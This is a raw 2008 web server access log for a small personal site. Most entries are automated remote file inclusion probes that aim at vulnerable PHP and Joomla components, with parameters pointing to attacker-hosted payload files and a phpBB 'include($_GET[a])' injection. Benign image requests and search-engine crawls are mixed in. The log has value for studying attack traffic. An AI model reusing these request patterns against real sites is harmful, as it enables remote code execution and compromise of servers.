216.133.240.133 - - [08/Feb/2008:08:22:49 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://d3c0d3r.altervista.org/files_e_bot/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.133.240.133 - - [08/Feb/2008:08:22:49 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://d3c0d3r.altervista.org/files_e_bot/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.133.240.133 - - [08/Feb/2008:08:22:49 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://d3c0d3r.altervista.org/files_e_bot/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.133.191.100 - - [08/Feb/2008:08:23:00 -0800] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.fwfccucc.org/n? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.133.191.100 - - [08/Feb/2008:08:23:00 -0800] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.fwfccucc.org/n? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
71.240.173.209 - - [08/Feb/2008:08:23:38 -0800] "GET /bikes/dteel/2008_02_07/IMG_4447s.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?p=383733" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
71.240.173.209 - - [08/Feb/2008:08:23:38 -0800] "GET /bikes/dteel/2008_02_07/IMG_4451s.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?p=383733" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
71.240.173.209 - - [08/Feb/2008:08:23:38 -0800] "GET /bikes/dteel/2008_02_07/IMG_4452s.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?p=383733" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
71.240.173.209 - - [08/Feb/2008:08:23:38 -0800] "GET /bikes/dteel/2008_02_07/IMG_4456s.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?p=383733" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
71.240.173.209 - - [08/Feb/2008:08:23:38 -0800] "GET /bikes/dteel/2008_02_07/IMG_4459s.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?p=383733" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
71.240.173.209 - - [08/Feb/2008:08:23:38 -0800] "GET /bikes/dteel/2008_02_07/IMG_4460s.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?p=383733" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
71.240.173.209 - - [08/Feb/2008:08:23:38 -0800] "GET /bikes/dteel/2008_02_07/IMG_4461s.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?p=383733" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
87.239.16.35 - - [08/Feb/2008:08:24:56 -0800] "GET /logs/access_080105.log/survey2/classes/core/language.php?rootdir=http://www.sumutprov.go.id/modules/poll/.../safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.239.16.35 - - [08/Feb/2008:08:24:56 -0800] "GET /survey2/classes/core/language.php?rootdir=http://www.sumutprov.go.id/modules/poll/.../safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.239.16.35 - - [08/Feb/2008:08:24:56 -0800] "GET /logs/survey2/classes/core/language.php?rootdir=http://www.sumutprov.go.id/modules/poll/.../safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.239.16.35 - - [08/Feb/2008:08:24:57 -0800] "GET /logs/access_080201.log/survey2/classes/core/language.php?rootdir=http://www.sumutprov.go.id/modules/poll/.../safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.227.90 - - [08/Feb/2008:08:25:05 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://web.starmovie.at/starmovie/ried//administrator/components/com_chronocontact/excelwriter/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
74.52.227.90 - - [08/Feb/2008:08:25:05 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://web.starmovie.at/starmovie/ried//administrator/components/com_chronocontact/excelwriter/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.9.159.213 - - [08/Feb/2008:08:25:14 -0800] "GET /logs/access_080103.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.greytauctions.org/phpAdsNew/auctions.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.159.213 - - [08/Feb/2008:08:25:14 -0800] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.greytauctions.org/phpAdsNew/auctions.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.159.213 - - [08/Feb/2008:08:25:15 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.greytauctions.org/phpAdsNew/auctions.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.70.19 - - [08/Feb/2008:08:25:33 -0800] "GET /logs/access_070823.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.19 - - [08/Feb/2008:08:26:02 -0800] "GET /logs/access_071208.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.19 - - [08/Feb/2008:08:26:02 -0800] "GET /logs/access_071209.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.19 - - [08/Feb/2008:08:26:21 -0800] "GET /tmp/ HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
72.29.68.22 - - [08/Feb/2008:08:26:28 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.29.68.22 - - [08/Feb/2008:08:26:32 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
69.10.219.245 - - [08/Feb/2008:08:28:39 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
69.10.219.245 - - [08/Feb/2008:08:28:39 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
69.10.219.245 - - [08/Feb/2008:08:28:39 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
62.151.23.213 - - [08/Feb/2008:08:29:08 -0800] "GET //components/com_forum/download.php?phpbb_root_pathhttp://sdenova.com/stats/include/test.txt??? HTTP/1.1" 404 275 "-" "Super_Ale46" "www.dmulk.com"
62.151.23.213 - - [08/Feb/2008:08:29:08 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_pathhttp://sdenova.com/stats/include/test.txt??? HTTP/1.1" 404 275 "-" "Super_Ale46" "www.dmulk.com"
67.77.184.236 - - [08/Feb/2008:08:29:40 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.gunslingerfirearms.com/store/squirrelcart/sc_data/agreements/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.192.68.20 - - [08/Feb/2008:08:30:32 -0800] "GET /logs/access_071230.log//account.php?action=http://www.pixeloutlet.com/cart/templates_c/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.192.68.20 - - [08/Feb/2008:08:30:32 -0800] "GET /logs//account.php?action=http://www.pixeloutlet.com/cart/templates_c/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.128.148.83 - - [08/Feb/2008:08:30:47 -0800] "GET /logs/access_080122.log//include.php?path[docroot]=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.128.148.83 - - [08/Feb/2008:08:31:08 -0800] "GET /logs/access_080122.log//include.php?path[docroot]=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.70.19 - - [08/Feb/2008:08:31:17 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
66.249.70.19 - - [08/Feb/2008:08:31:17 -0800] "GET /bikes/GPS/WeSTOC2008/ HTTP/1.1" 200 858 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
82.192.68.20 - - [08/Feb/2008:08:31:17 -0800] "GET /logs/access_071222.log//account.php?action=http://www.pixeloutlet.com/cart/templates_c/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.173 - - [08/Feb/2008:08:32:38 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
118.45.190.173 - - [08/Feb/2008:08:32:38 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
72.9.159.213 - - [08/Feb/2008:08:33:07 -0800] "GET /logs/access.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.greytauctions.org/phpAdsNew/auctions.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.20.136 - - [08/Feb/2008:08:33:29 -0800] "GET /bikes/CreSTOC07/?D=A HTTP/1.0" 200 15280 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.29.68.22 - - [08/Feb/2008:08:34:00 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.29.68.22 - - [08/Feb/2008:08:34:01 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
195.234.171.106 - - [08/Feb/2008:08:35:19 -0800] "GET /logs/index.php?template=http://autodelen.net//downloads/documenten/documenten.png?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
195.234.171.106 - - [08/Feb/2008:08:35:19 -0800] "GET /index.php?template=http://autodelen.net//downloads/documenten/documenten.png?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
64.208.172.172 - - [08/Feb/2008:08:38:05 -0800] "GET /_private/ HTTP/1.0" 403 163 "-" "ia_archiver" "www.dmulk.com"
69.10.158.86 - - [08/Feb/2008:08:38:06 -0800] "GET /logs/access.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.greytauctions.org/phpAdsNew/auctions.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.226.24 - - [08/Feb/2008:08:38:17 -0800] "GET //components/com_forum/download.php?phpbb_root_pathhttp://spiderporc.altervista.org/3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.246.218.140 - - [08/Feb/2008:08:40:10 -0800] "GET /logs/access_080108.log/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.246.218.140 - - [08/Feb/2008:08:40:10 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.246.218.140 - - [08/Feb/2008:08:40:11 -0800] "GET /logs/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.153.128.101 - - [08/Feb/2008:08:45:20 -0800] "GET /logs/access_080111.log//modules/TotalCalendar/about.php?inc_dir=http://test.iearn.uz/test.iearn.uz/help.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.9.152.104 - - [08/Feb/2008:08:45:58 -0800] "GET /logs/access_080120.log///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.moe.go.th/bic/fileadmin/.md/ipbot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.171.48.7 - - [08/Feb/2008:08:46:55 -0800] "GET /logs/access.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.greytauctions.org/phpAdsNew/auctions.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.192.212 - - [08/Feb/2008:08:47:13 -0800] "GET /logs/access_080121.log/index.php?redir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.153.128.101 - - [08/Feb/2008:08:47:45 -0800] "GET /logs/access_080111.log//modules/TotalCalendar/about.php?inc_dir=http://test.iearn.uz/test.iearn.uz/help.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.29.68.22 - - [08/Feb/2008:08:52:14 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.29.68.22 - - [08/Feb/2008:08:52:15 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
67.77.184.236 - - [08/Feb/2008:08:54:57 -0800] "GET /logs/access_080108.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.gunslingerfirearms.com/store/squirrelcart/sc_data/agreements/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.234.171.106 - - [08/Feb/2008:08:57:11 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://autodelen.net//downloads/documenten/documenten.png?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
195.234.171.106 - - [08/Feb/2008:08:57:11 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://autodelen.net//downloads/documenten/documenten.png?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
220.89.250.64 - - [08/Feb/2008:08:57:21 -0800] "GET /logs/access_071230.log//tools/send_reminders.php?noSet=0&includedir=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.89.250.64 - - [08/Feb/2008:08:57:27 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
118.45.190.173 - - [08/Feb/2008:08:57:29 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
118.45.190.173 - - [08/Feb/2008:08:57:29 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
220.89.250.64 - - [08/Feb/2008:08:57:33 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.116.91.62 - - [08/Feb/2008:08:58:44 -0800] "GET /logs/access_080201.log//?mosConfig_absolute_path=http://www.saenterpriseworkshop.com/vnc/MIC22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.116.91.62 - - [08/Feb/2008:08:58:45 -0800] "GET //?mosConfig_absolute_path=http://www.saenterpriseworkshop.com/vnc/MIC22.txt?? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
203.116.91.62 - - [08/Feb/2008:08:58:45 -0800] "GET /logs//?mosConfig_absolute_path=http://www.saenterpriseworkshop.com/vnc/MIC22.txt?? HTTP/1.1" 200 33690 "-" "libwww-perl/5.805" "www.dmulk.com"
203.116.91.62 - - [08/Feb/2008:09:02:17 -0800] "GET /logs/access_080103.log//?mosConfig_absolute_path=http://www.saenterpriseworkshop.com/vnc/MIC22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.226.24 - - [08/Feb/2008:09:02:34 -0800] "GET /logs/access_080117.log//components/com_forum/download.php?phpbb_root_pathhttp://spiderporc.altervista.org/3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.215.226.24 - - [08/Feb/2008:09:02:35 -0800] "GET //components/com_forum/download.php?phpbb_root_pathhttp://spiderporc.altervista.org/3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.215.226.24 - - [08/Feb/2008:09:02:35 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_pathhttp://spiderporc.altervista.org/3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.192.212 - - [08/Feb/2008:09:03:04 -0800] "GET /logs/access_080103.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [08/Feb/2008:09:03:04 -0800] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [08/Feb/2008:09:03:04 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.174.136 - - [08/Feb/2008:09:07:21 -0800] "GET /logs/write.php?dir=http://www.letstalkrecipes.com/jim.do??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
72.55.174.136 - - [08/Feb/2008:09:07:21 -0800] "GET /write.php?dir=http://www.letstalkrecipes.com/jim.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
212.227.99.185 - - [08/Feb/2008:09:07:28 -0800] "GET /write.php?dir=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
212.227.99.185 - - [08/Feb/2008:09:07:28 -0800] "GET /logs/write.php?dir=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
67.77.184.236 - - [08/Feb/2008:09:07:55 -0800] "GET /logs/access_080121.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.gunslingerfirearms.com/store/squirrelcart/sc_data/agreements/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.157.58.25 - - [08/Feb/2008:09:10:14 -0800] "GET /logs//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://safebrat.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
221.143.49.246 - - [08/Feb/2008:09:10:16 -0800] "GET /logs//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://safebrat.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
221.143.49.246 - - [08/Feb/2008:09:10:16 -0800] "GET //viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://safebrat.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
207.157.58.25 - - [08/Feb/2008:09:10:20 -0800] "GET //viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://safebrat.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
81.89.137.99 - - [08/Feb/2008:09:12:42 -0800] "GET /index.php?go1=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [08/Feb/2008:09:12:42 -0800] "GET /index.php?go1=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.192.212 - - [08/Feb/2008:09:12:58 -0800] "GET /logs/access.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.169.155.140 - - [08/Feb/2008:09:13:07 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.185.237.143 - - [08/Feb/2008:09:14:05 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://safe-bx.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
64.185.237.143 - - [08/Feb/2008:09:14:05 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://safe-bx.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
74.53.141.194 - - [08/Feb/2008:09:16:16 -0800] "GET /index.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
74.53.141.194 - - [08/Feb/2008:09:16:17 -0800] "GET /logs/index.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
72.29.68.22 - - [08/Feb/2008:09:16:45 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.29.68.22 - - [08/Feb/2008:09:16:46 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
213.215.226.24 - - [08/Feb/2008:09:16:54 -0800] "GET /logs/access_080121.log//components/com_forum/download.php?phpbb_root_pathhttp://spiderporc.altervista.org/3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.45.242.50 - - [08/Feb/2008:09:17:15 -0800] "GET /logs//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://safebrat.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
66.45.242.50 - - [08/Feb/2008:09:17:15 -0800] "GET //viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://safebrat.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
85.214.29.175 - - [08/Feb/2008:09:19:27 -0800] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.obzxpl.kit.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
85.214.29.175 - - [08/Feb/2008:09:19:27 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.obzxpl.kit.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
